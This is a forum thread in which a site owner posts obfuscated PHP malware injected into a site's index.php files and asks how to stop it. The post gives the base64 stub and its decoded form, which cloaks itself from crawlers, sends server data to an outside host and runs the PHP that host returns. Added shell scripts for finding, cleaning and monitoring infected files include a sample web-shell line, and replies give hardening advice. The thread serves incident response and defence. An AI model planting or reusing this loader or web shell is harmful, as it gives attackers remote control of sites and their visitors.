how to prevent from base64 attacks ?

Thread: how to prevent from base64 attacks ?

  1. #1
    Come Whatever you are !
    Join Date
    May 2010
    Location
    38.456 N - 27.115 E
    Posts
    32

    how to prevent from base64 attacks ?

    At one of our sites I found bad code at the top of the index.php and main.php files of nearly all scripts (calendars, gallery scripts, file uploading forms, etc.).
    I have pasted this bad code below; it was redirecting viewers, especially mobile viewers, to a porn site.
    I cleaned this code out of about 25 files, but I am in doubt whether it will come back again or not.

    Most of our scripts seem to be updated to the latest versions. What can I do for better security? We don't want this to happen again.
    What can you suggest, and what is the reason for that hacking? Please give me info.

    The code that I cleaned:

    PHP Code:
    <?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGhrdWhfYikgeyBnbG9iYWwgJGhrdWhfYjsgJGhrdWhfYiA9IDE7CiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRnaGZqdSA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgImJvdCIsICJzcGlkIiwgIkx5bngiLCAiUEhQIiwgIldvcmRQcmVzcyIuICJpbnRlZ3JvbWVkYiIsIlNJU1RSSVgiLCJBZ2dyZWdhdG9yIiwgImZpbmRsaW5rcyIsICJYZW51IiwgIkJhY2tsaW5rQ3Jhd2xlciIsICJTY2hlZHVsZXIiLCAibW9kX3BhZ2VzcGVlZCIsICJJbmRleCIsICJhaG9vIiwgIlRhcGF0YWxrIiwgIlB1YlN1YiIsICJSU1MiKTsKaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgIShAJF9DT09LSUVbJ3N0YXRzbGUnXSkgYW5kICgocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJGdoZmp1KSAuICIvaSIsICRia2xqZykpIG9yIChAJF9DT09LSUVbJ3N0YXRzbCddKSAgb3IgKCEkYmtsamcpIG9yICgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10gPT09ICJodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAiMTI3LjAuMC4xIikgIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10pIG9yICgkX0dFVFsnZGYnXSA9PT0gIjEiKSBvciAoJF9QT1NUWydkbCddID09PSAiMSIgKSAgb3IgKGluaV9nZXQoInNhZmVfbW9kZSIpKSBvciAoIWZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSkgb3IgKCFmdW5jdGlvbl9leGlzdHMoJ29iX3N0YXJ0JykpKSkKe30KZWxzZQp7CmZvcmVhY2goJF9TRVJWRVIgYXMgJG5kYnYgPT4gJGNiY2QpIHsgJGRhdGFfbmZkaC49ICImUkVNXyIuJG5kYnYuIj0nIi5iYXNlNjRfZW5jb2RlKCRjYmNkKS4iJyI7fQokY29udGV4dF9qaGtiID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKAphcnJheSgnaHR0cCc9PmFycmF5KAogICAgICAgICAgICAgICAgICAgICAgICAndGltZW91dCcgPT4gJzE1JywKICAgICAgICAgICAgICAgICAgICAgICAgJ2hlYWRlcicgPT4gIlVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IExpbnV4IGk2ODY7IHJ2OjEwLjAuOSkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMC4wLjlfIEljZXdlYXNlbC8xMC4wLjlcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIsCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywKICAgICAgICAgICAgICAgICAgICAgICAgJ2NvbnRlbnQnID0+ICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaAopKSk7CiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vZ2FsZXJpYS5iYW5hc3play5pbmZvL3BsdWdpbnMvZmx2cGxheWVyL3Nlc3Npb24ucGhwP2lkIiwgZmFsc2UgLCRjb250ZXh0X2poa2IpOwppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgic3RhdHNsIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdzdGF0c2w9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*68066*/ ?>

  2. #2
    Come Whatever you are !
    Join Date
    May 2010
    Location
    38.456 N - 27.115 E
    Posts
    32
    I decoded the bad code with an online decoding source. It is as follows;
    maybe it helps answer my questions above better.
    I wonder if there may be another file on the server that puts this bad code into our PHP files. If so, how can I find it?
    The site is a big site.
    Thanks

    Decoded code:
    PHP Code:
    error_reporting(0);
    // Runs once per request; the global is a guard against double inclusion.
    if(!$hkuh_b) { global $hkuh_b; $hkuh_b = 1;
    $bkljg=$_SERVER["HTTP_USER_AGENT"];
    // User-Agent substrings for search engines, crawlers, link checkers and feed readers.
    $ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
    // Cloaking. The empty branch is taken (nothing happens) for crawlers, empty user agents,
    // self-referrals, requests from the server itself, visitors already carrying the statsl
    // cookie, df=1/dl=1, safe_mode, or hosts lacking the needed functions. df=2, dl=2 or a
    // statsle cookie override all of that and force the payload (an operator test switch).
    if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['statsl'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )  or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
    {}
    else
    {
    // Every $_SERVER entry (headers, IP, URI, ...) is base64-encoded and POSTed to the
    // attacker's server, which decides what this visitor should get.
    foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
    $context_jhkb = stream_context_create(
    array('http'=>array(
                            'timeout' => '15',
                            'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                            'method' => 'POST',
                            'content' => "REM_REM='1'".$data_nfdh
    )));
    $vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id", false ,$context_jhkb);
    // Whatever PHP comes back is executed: the redirect the poster saw lives in that remote
    // response, not in this stub. If nothing comes back, the statsl cookie is set for two days
    // (via setcookie or, if headers are already out, via JavaScript) so the visitor is skipped.
    if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
    }
    }

    Last edited by ugurpc; 03-08-2013 at 11:47 AM.
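The question in the post above (is there another file that plants this code, and how do I find it?) comes down to searching the web root, reading the payload and stripping it. What follows is an added example and not code from this thread or from the poster's site: POSIX shell helpers that find PHP files carrying the `/*68066*/` marker or an `eval(base64_decode(...))` call, decode the payload locally, quarantine a copy before removing the injected block, and list recently changed files and files using the usual obfuscation primitives as leads for the dropper. The marker and the payload shape are taken from the code posted above; the sample web root the script builds is constructed for the demo, and `mktemp` plus a `base64` that accepts `-d` are assumed.

```shell
#!/bin/sh
# Added example, not code from the thread: triage helpers for the injected
# "<?php /*68066*/ ... @eval( base64_decode('...')); ... /*68066*/ ?>" block.
# Assumes a POSIX shell with find, grep, sed, mktemp and a base64 that accepts
# -d (GNU coreutils; busybox; recent BSD/macOS). The marker and payload shape
# come from the posted code; the sample web root below is constructed for the demo.

# 1. Files carrying the marker or an eval(base64_decode( call.
scan_webroot() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'eval[[:space:]]*\([[:space:]]*base64_decode|/\*68066\*/' {} + 2>/dev/null | sort
}

# 2. Decode the first eval(base64_decode('...')) argument locally, so the
#    payload can be read without handing it to a web decoder.
decode_payload() {
    sed -n "s|.*eval([[:space:]]*base64_decode('\([A-Za-z0-9+/=]*\)').*|\1|p" "$1" \
        | head -n 1 | base64 -d
}

# 3. Keep a copy for the investigation, then strip the injected block. Only the
#    text between the two 68066 markers is removed, so the site's own code on
#    that line survives. Diff the result before putting it back in service.
clean_file() {                      # $1 = infected file, $2 = quarantine dir
    mkdir -p "$2"
    cp "$1" "$2/$(basename "$1").$(date +%Y%m%d%H%M%S).infected"
    tmp="$1.clean.$$"
    sed 's#<?php /\*68066\*/.*/\*68066\*/ ?>##' "$1" > "$tmp" && mv "$tmp" "$1"
}

# 4. Leads for whatever wrote the prefix: PHP files changed in the last $2 days,
#    and files using the usual obfuscation primitives. Both need human review;
#    legitimate code calls base64_decode too, and a dropper that deleted itself
#    leaves neither.
recent_php_files() { find "$1" -type f -name '*.php' -mtime "-$2" | sort; }
hunt_obfuscation() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE '(eval|assert|gzinflate|gzuncompress|str_rot13)[[:space:]]*\(|preg_replace[[:space:]]*\(.*/e' {} + 2>/dev/null | sort
}

# Constructed sample: one infected calendar script, one clean gallery script.
# The payload is just error_reporting(0); the real one is in the post above.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/calendar" "$root/gallery"
    printf '%s\n%s\n' \
        "<?php /*68066*/ error_reporting(0); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw==')); /*68066*/ ?>" \
        '<?php echo "calendar"; ?>' > "$root/calendar/index.php"
    printf '%s\n' '<?php echo "gallery"; ?>' > "$root/gallery/main.php"
    echo "$root"
}

# Demo run. Real use: scan_webroot /var/www/site, decode_payload FILE,
# clean_file FILE /root/quarantine (paths with spaces need a while-read loop).
demo() {
    root=$(make_sample_tree); quarantine=$(mktemp -d)
    echo "infected:";       scan_webroot "$root"
    echo "payload:";        decode_payload "$root/calendar/index.php"; echo
    echo "leads:";          hunt_obfuscation "$root"
    for f in $(scan_webroot "$root"); do clean_file "$f" "$quarantine"; done
    echo "after cleaning:"; scan_webroot "$root"
    echo "quarantined:";    ls "$quarantine"
    rm -rf "$root" "$quarantine"
}
demo
```

The quarantine copies keep their `.infected` suffix so the web server never executes them, and the recent-files list is only as good as the attacker's care: a dropper that touched the files with their old timestamps, or deleted itself, will not show up there, which is why the next step is checking the account's own access paths (passwords, FTP, the hosting neighbours) rather than only the file tree.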

  3. #3
    High Energy Magic Dept. NogDog
    Join Date
    Aug 2006
    Location
    Ankh-Morpork
    Posts
    13,816
    The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site; that's just the payload the attacker left once they found a way in.

    They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult-to-hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) is via SSL).

    If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even moving to a different host).

    There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-party apps have the latest security patches!).
    "Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be." ~ from Nation, by Terry Pratchett

    "But the main reason that any programmer learning any new language thinks the new language is SO much better than the old one is because he's a better programmer now!" ~ http://www.oreillynet.com/ruby/blog/...ck_to_p_1.html


    eBookworm.us
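The answer above says to change the credentials and find the hole; until the hole is found, the practical way to know whether the code "comes back again" is a file-integrity baseline of the web root that is re-checked on a schedule. The following is an added example, not code from this thread: it records a sorted SHA-256 manifest of every file and, on each check, reports ADDED, REMOVED and MODIFIED paths, so a re-planted prefix or a freshly dropped script is noticed the next morning rather than when mobile visitors complain. It assumes a POSIX shell with `find`, `sort`, `diff`, `mktemp` and `sha256sum` (GNU coreutils or busybox; on BSD/macOS run it with `SHA='shasum -a 256'`); the web root and files in the demo are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread: baseline and re-check the web root's
# file digests so a re-planted prefix shows up as MODIFIED and a dropped file
# as ADDED. Assumes POSIX sh, find, sort, diff, mktemp and sha256sum (GNU
# coreutils / busybox). On BSD/macOS run with SHA='shasum -a 256'.
# Paths containing whitespace are not handled (awk splits on blanks).

SHA=${SHA:-sha256sum}

# Digest every file under $1, sorted by path so two runs can be diffed.
digest_tree() {
    (cd "$1" && find . -type f -exec $SHA {} + | LC_ALL=C sort -k 2)
}

# Write the manifest for web root $1 to $2. Keep the manifest (and this script)
# outside the web root, ideally on another host: whoever rewrote index.php can
# just as easily rewrite a manifest stored next to it.
baseline() {
    digest_tree "$1" > "$2"
}

# Compare web root $1 against manifest $2. Prints one line per difference
# (ADDED / REMOVED / MODIFIED path) and returns 1 if there were any, so a cron
# job can mail the output or page someone.
verify() {
    current=$(mktemp)
    digest_tree "$1" > "$current"
    report=$(diff "$2" "$current" | awk '
        /^</ { old[$3] = 1 }
        /^>/ { new[$3] = 1 }
        END {
            for (p in old) { if (p in new) print "MODIFIED " p; else print "REMOVED  " p }
            for (p in new) { if (!(p in old)) print "ADDED    " p }
        }' | LC_ALL=C sort)
    rm -f "$current"
    if [ -n "$report" ]; then
        printf '%s\n' "$report"
        return 1
    fi
    return 0
}

# Demo on a constructed tree: baseline, then plant the same kind of prefix
# seen in the thread plus a new file, and re-check.
# Real use: baseline /var/www/site /root/site.sha256 once after cleaning,
# then verify /var/www/site /root/site.sha256 from cron.
demo() {
    root=$(mktemp -d); manifest=$(mktemp)
    mkdir -p "$root/calendar" "$root/gallery"
    printf '%s\n' '<?php echo "calendar"; ?>' > "$root/calendar/index.php"
    printf '%s\n' '<?php echo "gallery"; ?>'  > "$root/gallery/main.php"
    baseline "$root" "$manifest"
    echo "first check (expect no output):"; verify "$root" "$manifest" || true
    printf '%s\n' '<?php /*68066*/ @eval(base64_decode("")); /*68066*/ ?>' \
        '<?php echo "calendar"; ?>' > "$root/calendar/index.php"
    mkdir -p "$root/uploads"
    printf '%s\n' '<?php @eval($_POST["c"]); ?>' > "$root/uploads/x.php"
    echo "second check:"; verify "$root" "$manifest" || echo "(tampering detected)"
    rm -rf "$root" "$manifest"
}
demo
```

Expect noise from the application itself (caches, session files, uploaded images): either exclude those directories from the `find` or, better, keep them outside the tree that holds executable code. After a legitimate update, clean the tree, then re-run `baseline`; a manifest taken from an already compromised tree only proves that nothing changed since the compromise.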

  4. #4
    Pedantic Curmudgeon Weedpacket
    Join Date
    Aug 2002
    Location
    General Systems Vehicle "Thrilled To Be Here"
    Posts
    21,771
    The OWASP project provides a lot of material for helping secure web sites, including descriptions of vulnerabilities a site might have and the attacks that exploit them; they also include a 3-yearly assessment of the top ten risks facing current web applications (including a specific section for PHP).
    THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER
    FAQs! FAQs! FAQs! Most forums have them!
    Search - Debugging 101 - Collected Solutions - General Guidelines - Getting help at all

  5. #5
    Senior Member Derokorian
    Join Date
    Apr 2011
    Location
    Denver
    Posts
    1,740
    Hey weed, thanks for the links. I've not seen this site before and it shall give me some reading to do.
    Sadly, nobody codes for anyone on this forum. People taste your dishes and tell you what is missing, but they don't cook for you. ~anoopmail
    I'd rather be a comma, then a full stop.
    User Authentication in PHP with MySQLi - Don't forget to mark threads resolved - MySQL(i) warning

  6. #6
    Come Whatever you are !
    Join Date
    May 2010
    Location
    38.456 N - 27.115 E
    Posts
    32
    Thank you for the answers and the valuable info you posted, NogDog and Weedpacket.

  7. #7
    Pedantic Curmudgeon Weedpacket
    Join Date
    Aug 2002
    Location
    General Systems Vehicle "Thrilled To Be Here"
    Posts
    21,771
    Quote Originally Posted by ugurpc
    I decoded the bad code with an online decoding source. It is as follows:
    Incidentally there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: base64_decode.
